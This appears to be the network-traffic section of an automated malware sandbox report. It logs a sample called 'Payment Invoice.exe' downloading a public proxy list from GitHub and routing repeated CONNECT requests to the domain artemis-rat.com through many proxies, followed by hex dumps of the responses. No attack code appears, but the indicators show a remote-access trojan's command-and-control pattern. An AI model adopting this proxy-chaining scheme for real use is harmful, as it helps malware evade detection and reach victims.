                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:39.620557070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:51.620496035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:03.714226007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:04.176429033 CET536INHTTP/1.1 500 Internal Server Error
                                                                Date: Mon, 11 Mar 2024 15:16:05 GMT
                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                Content-Length: 614
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of
                                                                Mar 11, 2024 16:16:04.176455021 CET270INData Raw: 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72
                                                                Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 44


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1926192.168.2.45386423.94.123.20288887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:27.366055965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.386308908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.386699915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:42.973714113 CET84INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:42 GMT
                                                                Transfer-Encoding: chunked


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1927192.168.2.455236123.241.210.123807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:27.370553017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.274823904 CET326INHTTP/1.1 400 Bad Request
                                                                Server: nginx
                                                                Date: Mon, 11 Mar 2024 15:15:27 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>
                                                                Mar 11, 2024 16:15:30.969295979 CET326INHTTP/1.1 400 Bad Request
                                                                Server: nginx
                                                                Date: Mon, 11 Mar 2024 15:15:27 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1928192.168.2.453977162.214.102.195503667076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:27.391993999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1929192.168.2.453875107.180.90.8879367076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:27.398092031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.589162111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.628268957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1930192.168.2.453871103.220.205.16246737076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:27.424556017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1931192.168.2.452166103.97.179.11510807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:27.429393053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1932192.168.2.455223105.112.140.21880807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:27.454690933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.106486082 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1933192.168.2.455212142.54.226.21441457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:27.507905006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1934192.168.2.455249218.6.120.11177777076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:27.508116961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:35.102292061 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1935192.168.2.455228115.146.225.137100467076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:27.545727015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.714212894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1936192.168.2.453859103.148.51.1980807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:27.602845907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1937192.168.2.455254195.138.65.3456787076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:27.611227036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1938192.168.2.45377651.68.164.77545047076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:27.623331070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1939192.168.2.45413280.78.64.7041457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:27.671458960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1940192.168.2.455214192.252.216.8141457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:27.677308083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1941192.168.2.455257176.113.157.149374177076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:27.722991943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1942192.168.2.455237209.14.112.810807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:27.810786009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1943192.168.2.45418478.83.242.22941457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:27.864593983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.449731140.82.113.44437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-03-11 15:15:11 UTC101OUTGET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1
                                                                Host: github.com
                                                                Connection: Keep-Alive
                                                                2024-03-11 15:15:12 UTC506INHTTP/1.1 200 OK
                                                                Server: GitHub.com
                                                                Date: Mon, 11 Mar 2024 15:15:12 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                ETag: W/"c37f50e74e0089856fba6090064a1888"
                                                                Cache-Control: max-age=0, private, must-revalidate
                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                X-Frame-Options: deny
                                                                X-Content-Type-Options: nosniff
                                                                X-XSS-Protection: 0
                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                2024-03-11 15:15:12 UTC3597INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                2024-03-11 15:15:12 UTC21INData Raw: 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                Data Ascii: connection: close
                                                                2024-03-11 15:15:12 UTC1370INData Raw: 38 30 30 30 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72
                                                                Data Ascii: 8000<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pr
                                                                2024-03-11 15:15:12 UTC1370INData Raw: 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 61 66 61 39 39 64 63 66 34 30 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                Data Ascii: ="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-afa99dcf40f7.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/
                                                                2024-03-11 15:15:12 UTC1370INData Raw: 67 69 74 68 75 62 2d 66 34 64 38 35 37 63 62 63 39 36 61 2e 63 73 73 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 72 65 70 6f 73 69 74 6f 72 79 2d 36 32 34 37 63 61 32 33 38 66 64 34 2e 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73
                                                                Data Ascii: github-f4d857cbc96a.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/repository-6247ca238fd4.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubass
                                                                2024-03-11 15:15:12 UTC1370INData Raw: 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 61 34 63 31 38 33 2d 37 39 66 39 36 31 31 63 32 37 35 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69
                                                                Data Ascii: ps://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183-79f9611c275b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://gi
                                                                2024-03-11 15:15:12 UTC1370INData Raw: 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 6f 6d 62 6f 62 6f 78 2d 6e 61 76 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6d 61 72 6b 64 6f 77 6e 2d 74 6f 6f 6c 62 61 72 2d 65 2d 38 32 30 66 63 30 2d 62 63 38 66 30 32 62 39 36 37 34 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72
                                                                Data Ascii: " defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.js"></script><script crossorigin="anonymous" defer
                                                                2024-03-11 15:15:12 UTC1370INData Raw: 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6c 65 6d 65 6e 74 2d 72 65 67 69 73 74 72 79 2d 38 35 37 34 35 33 30 61 36 63 64 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f
